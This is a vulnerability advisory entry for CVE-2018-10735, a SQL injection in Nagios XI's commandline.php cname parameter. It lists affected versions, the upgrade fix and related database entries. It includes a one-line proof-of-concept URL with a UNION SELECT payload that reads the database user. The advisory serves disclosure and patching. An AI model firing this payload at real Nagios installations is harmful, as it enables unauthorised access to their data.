Lucene search
KnownsecSSV:97265HistoryMay 04, 2018 - 12:00 a.m.
NagiosXI <= 5.4.12 commandline.php SQL injection(CVE-2018-10735)
2018-05-0400:00:00
Knownsec
www.seebug.org
60
0.037 Low
EPSS
Percentile
91.8%
NagiosXI <= 5.4.12 commandline.php SQL injection(CVE-2018-10735)
Description
A SQL injection issue was discovered in Nagios XI via the admin/commandline.php cname parameter.
Affected Version
- Nagios XI 5.2.x
- Nagios XI 5.4.x before 5.4.13
Proof of concept
http://xxx/nagiosql/admin/commandline.php?cname='%20union%20select%20concat(0x7e7e7e,user(),0x7e7e7e)%23
Fix
Upgrade to version 5.4.13
Related
cve
cve
CVE-2018-10735
2018-05-16 13:29:00
nuclei
nuclei
NagiosXI <= 5.4.12 `commandline.php` SQL injection
2024-04-02 04:01:16
ubuntucve
ubuntucve
CVE-2018-10735
2018-05-16 00:00:00
prion
prion
Sql injection
2018-05-16 13:29:00
cvelist
cvelist
CVE-2018-10735
2018-05-16 13:00:00
nvd
nvd
CVE-2018-10735
2018-05-16 13:29:00
openvas
openvas
Nagios XI Multiple Vulnerabilities (Apr 2018) - Active Check
2018-04-27 00:00:00